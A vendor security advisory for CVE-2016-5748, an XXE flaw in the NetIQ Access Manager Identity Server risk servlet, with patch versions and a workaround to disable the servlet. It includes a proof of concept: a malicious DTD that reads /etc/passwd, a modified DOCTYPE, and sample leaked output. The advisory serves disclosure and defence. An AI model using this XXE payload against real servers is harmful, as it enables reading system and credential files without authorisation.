Access Manager XXE vulnerability with test risk servlet (CVE-2016-5748)

  • 7017797
  • 01-Jul-2016
  • 29-Aug-2016


NetIQ Access Manager 4.2
NetIQ Access Manager 4.1
Access Manager Identity Server


Access Manager 4.1 and 4.2 support risk based authentication on the Identity Server. Available with this feature is the risk servlet (/nidp/test/risk) that allows administrators and users verify that their risk scores are. It is possible to modify the accompanying JSP page to trigger an External Entity Processing (XXE) vulnerability (

To do this, one needs access to modify /opt/novell/nids/lib/webapp/jsp/risk.jsp and change the default DTD file (loose.dtd) to point to another DTD file that does more damage eg. with a remotely accessible DTD you can execute an XXE attack that can in turn read the file system and any readable file on the IDP.

a) create sample DTD (test.dtd) on a web server for file access on the attacked system:

pentest@nam:~/neil$ cat test.dtd
<!ENTITY % p1 SYSTEM "file:///etc/passwd"> <!ENTITY % p2 "<!ENTITY e1 SYSTEM ';'>">%p2;

b) modify the risk.jsp to point to the test.dtd file created on the web server in a) above:

<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "" > <foo>&e1;</foo>

c) Access the risk servlet at where is the IDP server domain name, and confirm you see thecontents of /etc/password in browser:

<SOAP-ENV:Envelope xmlns:SOAP-ENV=""><SOAP-ENV:Body><SOAP-ENV:Fault><faultcode>Client</faultcode><faultstring>
at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash
ftp:x:40:49:FTP account:/srv/ftp:/bin/bash
games:x:12:100:Games account:/var/games:/bin/bash
haldaemon:x:101:102:User for haldaemon:/var/run/hald:/bin/false


Apply 4.2.2 for NAM 4.2; or 4.1.2 Hot Fix 1 for NAM 4.1.

As a workaround, one can also disable the risk.jsp in the web.xml file at /opt/novell/nids/lib/webapp/WEB-INF/web.xml. Simply delete the following lines and restart the IDP server with 'rcnovell-idp restart':

        <!--  To disable the risk module test tool  block below servlet and servlet-mapping tags -->
                <display-name>test risk group</display-name>